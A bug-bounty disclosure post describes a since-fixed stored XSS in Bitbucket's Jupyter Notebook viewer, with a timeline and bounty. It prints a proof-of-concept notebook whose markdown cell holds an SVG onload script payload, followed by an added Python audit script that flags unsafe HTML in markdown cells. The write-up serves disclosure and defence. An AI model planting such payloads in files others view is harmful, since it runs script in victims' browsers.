One day, I found that Bitbucket could render Jupyter Notebooks.
I had already found a Jupyter Notebook (ipynb) XSS on GitLab, so I looked into Bitbucket, thinking that it had a similar vulnerability.
Let me get straight to the point: I found a Jupyter Notebook XSS, just like on GitLab.
PoC
The content of an ipynb file is JSON. When markdown is specified for cell_type, the Markdown text included in source is rendered as HTML.
An ipynb file for this would look something like this.
    {
      "cells": [
        {
          "cell_type": "markdown",
          "metadata": {},
          "source": [
            "# This is Markdown Text",
            "<svg/onload=alert(document.origin)>"
          ]
        }
      ],
      "metadata": {
        "kernelspec": {
          "display_name": "Python 3",
          "language": "python",
          "name": "python3"
        },
        ...
      }
    }
After pushing this ipynb file to the repository, the script was executed just by viewing the ipynb with the Note Viewer.
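A check a repository owner could run over committed notebooks, as an added example that is not part of the original post or of Bitbucket's code: it parses each markdown cell's source with Python's html.parser and reports tags and attributes outside an allowlist. The allowlist contents and the names MarkupAudit and audit_notebook are assumptions of this example.

```python
import json
from html.parser import HTMLParser

# Assumed allowlist for this example; adjust to what the viewer must display.
SAFE_TAGS = {"a", "b", "i", "em", "strong", "code", "pre", "p", "br",
             "ul", "ol", "li", "img", "table", "tr", "th", "td"}
SAFE_ATTRS = {"href", "src", "alt", "title"}
SAFE_URLS = ("http://", "https://", "mailto:", "#", "/")


class MarkupAudit(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.found = []  # (kind, name) for everything outside the allowlist

    def handle_starttag(self, tag, attrs):
        if tag not in SAFE_TAGS:
            self.found.append(("tag", tag))
        for name, value in attrs:
            url = (value or "").strip().lower()
            if name.startswith("on"):
                self.found.append(("event-handler", name))
            elif name not in SAFE_ATTRS:
                self.found.append(("attribute", name))
            elif name in ("href", "src") and not url.startswith(SAFE_URLS):
                self.found.append(("url", name))


def audit_notebook(text):
    """Return (cell_index, kind, name) for raw HTML in markdown cells."""
    findings = []
    for index, cell in enumerate(json.loads(text).get("cells", [])):
        if cell.get("cell_type") != "markdown":
            continue
        source = cell.get("source", "")  # nbformat allows a string or a list
        parser = MarkupAudit()
        parser.feed(source if isinstance(source, str) else "".join(source))
        parser.close()
        findings += [(index, kind, name) for kind, name in parser.found]
    return findings


# Constructed samples: the PoC's markdown cell (elided metadata omitted) and a benign one.
POC = json.dumps({"cells": [{"cell_type": "markdown", "metadata": {}, "source": [
    "# This is Markdown Text", "<svg/onload=alert(document.origin)>"]}]})
BENIGN = json.dumps({"cells": [{"cell_type": "markdown", "source": "<b>ok</b>"}]})

if __name__ == "__main__":
    print(audit_notebook(POC), audit_notebook(BENIGN))
```

A scan like this flags notebooks for review; it does not replace sanitizing the rendered HTML in the viewer.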
Bitbucket rewarded me with $600.
Thanks Atlassian! 😎
Timeline
- 2018-07-01 : I found this vulnerability and reported it to Bitbucket
- 2018-07-05 : Report triaged
- 2018-07-11 : Got $600 bounty
- 2018-07-20 : Fixed